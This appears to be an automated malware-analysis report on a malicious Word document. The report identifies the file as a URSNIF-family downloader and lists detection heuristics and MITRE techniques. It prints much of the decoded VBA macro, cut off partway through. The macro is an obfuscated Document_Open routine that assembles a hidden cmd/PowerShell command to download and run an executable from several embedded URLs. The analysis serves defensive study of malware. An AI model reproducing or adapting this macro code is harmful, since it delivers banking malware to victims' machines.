MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the Document_Open event and uses the Shell() function to execute commands. This indicates an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' suggests a downloader functionality, potentially related to the URSNIF family.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6605 bytes |
SHA-256: b17fdee486422cac3d1a1adf4248b98b6baf2eb3c3c76caad8d9bdc322feda52 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RwRnmpSqNVm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
VarType "rzAfXb" + "ui" + "hD" + "i"
VarType "w" + "490673515" + "255797478" + "485032151"
VarType "174309526" + "ijBPan"
VarType "b" + "Sc" + "Tj" + "292884507"
VarType "TnqJafcPPTPRi" + "zrY" + "qhZr" + "WofMnKjVQCMf"
Shell NJrIzis + kthrTOEdO + CfvAwO, Format(vbHide)
VarType "9432" + "195024788"
VarType "f" + "dfv"
VarType "285956793" + "FV"
VarType "187433196" + "XN"
VarType "72554802" + "DTbwT" + "uT" + "111752215"
End Sub
Attribute VB_Name = "wwPWBwEDkUu"
Function NJrIzis()
On _
Error _
Resume _
Next
VarType "znvvv" + "7512" + "531526858" + "IjSXm"
VarType "QSAJsRBCiG" + "bjX"
VarType "fwiB" + "JcMkwYtzC"
VarType "7286" + "OMa" + "3850" + "zbM"
VarType "auWYMJJNNU" + "OwkA" + "TaQwYqwzf" + "HLo"
arNbG = Format(Chr(9 + 8 + 9 + 18 + 55)) + "m" + "d /V:/" + Format(Chr(6 + 5 + 6 + 12 + 38)) + Format(Chr(2 + 2 + 3 + 5 + 22)) + "s^e" + "^"
VarType "GqoY" + "413751772" + "tHDbHrcwb" + "RD"
VarType "3375" + "jXXkEVlwOAamNm" + "186494586" + "o"
WnOLtNJ = "t" + " 3^0^4=" + " " + "^ ^ " + "^ ^" + " "
VarType "425455560" + "392447331" + "9744" + "N"
VarType "U" + "kQm"
iinctdircfl = "^ ^ " + " ^ ^ " + " ^ " + "^}^}" + "{h" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^t" + "a" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "}" + ";k^"
VarType "1386" + "hXVNd" + "jF" + "CIu"
VarType "A" + "ipwnzL"
sIkltsvZMjQ = "aer^b^" + ";" + "^w^EF" + "^$^ ^me" + "^" + "tI^-e^" + "k^o" + "vn" + "I;" + ")^w" + "E^" + "F$^ ,^t"
VarType "Y" + "9494" + "17112871" + "M"
VarType "439877225" + "307654364"
VarType "iVzn" + "DQAJkF"
zvnScOWdSwz = "^E^L$" + "(^eli" + "^Fd" + "^a^o^l" + "n" + "^woD^.Y" + "^lw^" + "$^{" + "^yrt^{" + ")"
VarType "143403302" + "2802"
hWifUOS = "^FnR$^" + " ni " + "^tEL^$(" + "^h" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^" + "a^er^of" + ";^" + "'^ex^e" + ".^'" + "^" + "+Q" + "^zD$+^'"
VarType "o" + "zj"
VarType "vGjzFdjMizp" + "Y" + "5662" + "HlCkC"
VarType "w" + "49391447" + "9544" + "5665"
VarType "RKP" + "zTLbVWs" + "FM" + "8773"
SXDISGMP = "^" + "\^'+" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^i" + "lbu^p^:" + "vne$" + "^=" + "w^E^F$^" + ";^" + "'" + "^2^0^8^" + "'^ ^= " + "^Q^z"
NJrIzis = arNbG + WnOLtNJ + iinctdircfl + sIkltsvZMjQ + zvnScOWdSwz + hWifUOS + SXDISGMP
VarType "109026521" + "GQUGTwDpatVvKi"
VarType "UnwaUV" + "201" + "hkHvlQhhc" + "99981430"
VarType "ZjSz" + "iMJ" + "Q" + "dc"
VarType "4463" + "X"
End Function
Function kthrTOEdO()
On _
Error _
Resume _
Next
VarType "I" + "wN" + "iwhpPww" + "8983571"
VarType "nSdWP" + "454234424"
zfspwk = "D$^;)^'" + "^@'(t" + "^i^l^p" + "S.^" + "'^B" + "H^8XJ^" + "i^sk/" + "^mo" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "^" + "." + "vrt^-ai" + "^gr^"
VarType "BX" + "vAMowM"
VarType "3231" + "DYic" + "lttDbrwCP" + "356106530"
VarType "312668124" + "f" + "Xr" + "5621"
VarType "5086" + "mVYdjG" + "wShchMBJ" + "502956126"
MSQzEKNLM = "o^e^g/" + "/:" + "p^" + "t" + "t^h^@" + "^fkX^F4"
VarType "6039" + "dfpr"
VarType "YiwwiHw" + "814" + "vHhdDI" + "GSvI"
VarType "463420084" + "UvKHqlk" + "231188923" + "SMKabuRrmlKHZ"
VarType "mw" + "iMPzTv"
VarType "7402" + "USDFIkf" + "dfBBPSB" + "1357"
HVAfP = "P^" + "E5U" + "4/TN^E" + "MY^" + "AP/^O^E" + "^548^6/" + "^mo" + Format(Chr(9 + 8 + 9 + 18 + 55)) + "." + "^db^g" + "n^it" + "^s" + "^o^hev"
VarType "GaXGvwWtApDiop" + "VLkduWCb" + "dO" + "Jzh"
VarType "4480" + "SM"
EwqiJYXQcH = "^il.r^e" + "vr^" + "es" + "//^:^p^" + "t^t" + "^h^" + "@VvR"
VarType "1604" + "iAVqR"
VarType "5571" + "7236"
VarType "EFc" + "VuKiPIlU"
VarType "riD" + "uovo" + "258712479" + "476822968"
VarType "bEwJcjQMvS" + "427305951" + "vQbpbH" + "53040335
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.